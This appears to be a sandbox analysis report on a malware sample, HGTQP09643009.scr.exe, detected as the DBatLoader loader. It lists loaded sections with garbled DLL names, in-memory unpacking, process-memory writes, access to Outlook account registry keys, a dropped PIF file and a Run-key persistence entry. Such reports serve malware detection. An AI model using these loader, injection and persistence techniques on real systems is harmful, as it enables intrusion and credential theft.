Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?p.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?p?? .dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??i?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?????p?? .dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?????p??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?????p??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?????p??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??i.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ?p.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??l?.dll	Jump to behavior

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Window found: window name: SysTabControl32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\SndVol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source: HGTQP09643009.scr.exe

Static file information: File size 1103360 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996605803.000000007F470000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Unpacked PE file: 0.2.HGTQP09643009.scr.exe.2900000.0.unpack

Yara detected DBatLoader

Source: Yara match

File source: 0.2.HGTQP09643009.scr.exe.2900000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_02917CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_02917CA8

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029032FC push eax; ret	0_2_02903338
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0291D204 push ecx; mov dword ptr [esp], edx	0_2_0291D209
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290635A push 029063B7h; ret	0_2_029063AF
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290635C push 029063B7h; ret	0_2_029063AF
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02906730 push 02906772h; ret	0_2_0290676A
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290672E push 02906772h; ret	0_2_0290676A
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290C4E4 push ecx; mov dword ptr [esp], edx	0_2_0290C4E9
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290D518 push 0290D544h; ret	0_2_0290D53C
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290CB64 push 0290CCEAh; ret	0_2_0290CCE2
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_0290C892 push 0290CCEAh; ret	0_2_0290CCE2
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917884 push 02917901h; ret	0_2_029178F9
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029168BE push 0291696Bh; ret	0_2_02916963
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029168C0 push 0291696Bh; ret	0_2_02916963
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917ED0 push 02917F08h; ret	0_2_02917F00
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02912ED8 push 02912F4Eh; ret	0_2_02912F46
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02919E74 push 02919EACh; ret	0_2_02919EA4
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02912FE3 push 02913031h; ret	0_2_02913029
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02912FE4 push 02913031h; ret	0_2_02913029
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02917C5C push 02917C9Eh; ret	0_2_02917C96
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02927DA0 push 02927F6Eh; ret	0_2_02927F66
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_02915DF4 push ecx; mov dword ptr [esp], edx	0_2_02915DF6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00457106 push ecx; ret	3_2_00457119
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0045B11A push esp; ret	3_2_0045B141
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0045E54D push esi; ret	3_2_0045E556
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00457A28 push eax; ret	3_2_00457A46
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00434E56 push ecx; ret	3_2_00434E69
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053AE41A push esi; ret	3_2_053AE423
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05351725 push edx; ret	3_2_05351743
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053A86F5 push eax; ret	3_2_053A8713
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053A7DD3 push ecx; ret	3_2_053A7DE6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053AAFE7 push esp; ret	3_2_053AB00E

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\Libraries\Jsqwmpul.PIF

Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

3_2_00406EB0

Source: C:\Windows\SysWOW64\extrac32.exe

File created: C:\Users\Public\Libraries\Jsqwmpul.PIF

Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_0041AA4A

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jsqwmpul			Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jsqwmpul			Jump to behavior

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_02919EB0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_02919EB0

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
